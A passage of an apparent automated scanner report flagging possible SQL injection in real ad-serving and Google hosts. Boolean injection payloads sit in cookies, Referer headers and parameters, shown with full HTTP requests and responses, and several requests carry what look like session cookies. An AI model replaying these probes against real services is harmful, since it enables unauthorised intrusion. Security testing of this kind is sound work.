Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 151275073/1225019603/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.17. http://q1.checkm8.com/adam/report [C cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/report

Issue detail

The C cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the C cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t'%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:24 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: A=dvV7X9w11Q9MvENT06Sba;Path=/;
Set-cookie: C=o7H9X9wRUHZUchaPa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:43 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143418691/1217163655/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

Request 2

GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t'%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:24 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: C=o7H9X9wRUHZUchaPa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:43 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 143418691/1217163655/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


1.18. http://q1.checkm8.com/adam/report [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/report

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 80156717'%20or%201%3d1--%20 and 80156717'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=80156717'%20or%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:38 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.18 NY-AD8
Set-cookie: A=dvV7X9wiI18ZvENT06Sba;Path=/;
Set-cookie: C=omI9X9wB2HY7chadb4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:58 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 167371135/1241135538/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

Request 2

GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=80156717'%20or%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:39 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.18 NY-AD8
Set-cookie: C=omI9X9wB2HY7chaeb4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:58 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 167371135/1241135538/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


1.19. http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /safebrowsing'/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc HTTP/1.1
Host: safebrowsing-cache.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH
Pragma: no-cache
Cache-Control: no-cache

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 11:41:22 GMT
Server: sffe
Content-Length: 11872
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:
...[SNIP]...

Request 2

GET /safebrowsing''/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc HTTP/1.1
Host: safebrowsing-cache.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH
Pragma: no-cache
Cache-Control: no-cache

Response 2

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://www.google.com/sorry/?continue=http://safebrowsing-cache.google.com/safebrowsing%27%27/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc
Content-Length: 357
Date: Sat, 17 Sep 2011 11:41:28 GMT
Server: GFE/2.0

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/sorry/?con
...[SNIP]...

1.20. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ktextColor parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The ktextColor parameter appears to be vulnerable to SQL injection attacks. The payloads 21208523%20or%201%3d1--%20 and 21208523%20or%201%3d2--%20 were each submitted in the ktextColor parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=00000021208523%20or%201%3d1--%20&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A3%3A41&ranreq=0.31895528361201286&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71897565&rk1=2053665&rk2=1316239421.077&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; DPPIX_ON=YES

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:22:06 GMT
Content-Length: 1477
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:22:06 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA/WgAAAAAAAAAAAAAAAAAAAAAAAAAAAABBgAAAGgMAANgCAABaAAAABwAAAAEAAAABAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=></div>');
document.writeln('<SCRIPT>');
document.writeln('document.write("<scr"+"ipt src=\'http://afe.specificclick.net?l=1966491151&sz=728x90&wr=j&t=j&u="+escape(document.location)+"&r="+escape(document.referrer)+"\'></scri"+"pt>");');
document.writeln('</SCRIPT>');
document.writeln('<NOSCRIPT>');
document.writeln('<A HREF="[default_href]"> <IMG SRC="[default_img_src]" WIDTH=728 HEIGHT=90 border=0 ALT="Click Here!"></IMG></A>');
document.writeln('</NOSCRIPT>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?operId=1&pubId=27330&siteId=27331&adId=23103&adServerId=794&kefact=0.500000&kpbmtpfact=0.000000&kadNetFrequecy=0&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1316222526&indirectAdId=32833&adServerOptimizerId=1&ranreq=0.31895528361201286&defaultReq=1&defaultedAdServerId=1053&kadDefNetFreq=0&imprCap=1&pageURL=http://ad.afy11.net/ad"> </iframe>');

Request 2

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=00000021208523%20or%201%3d2--%20&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A3%3A41&ranreq=0.31895528361201286&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71897565&rk1=2053665&rk2=1316239421.077&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:; DPPIX_ON=YES

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:22:07 GMT
Content-Length: 1828
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:22:06 GMT; path=/
Set-Cookie: _curtime=1316222527; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:32:07 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwidth="0" vspace="0" hspace="0" src="http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAACAAAANTU3ODUzMDctQTVEQy00RTNBLUI0NTItRERCRDQyNkQzQTFEAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAA=_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=46AD5D33-3A03-4DF5-99B7-CA6C61AD8658&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D71897565%26rk1%3D2053665%26rk2%3D1316239421.077%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207"></iframe>\');<'+'/script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?operId=1&pubId=27330&siteId=27331&adId=23103&adServerId=243&kefact=0.500000&kpbmtpfact=0.741500&kadNetFrequecy=0&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1316222527&indirectAdId=0&adServerOptimizerId=2&ranreq=0.31895528361201286&defaultReq=1&defaultedAdServerId=1053&kadDefNetFreq=0&campaignId=1336&creativeId=0&pctr=0.000000&imprCap=1&pageURL=http://ad.afy11.net/ad"> </iframe>');

1.21. http://tag.contextweb.com/TagPublish/GetAd.aspx [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:49:38 GMT
Content-Length: 2565
Connection: close
Set-Cookie: vf=1100; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app207_5vjkeBW8txQp%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
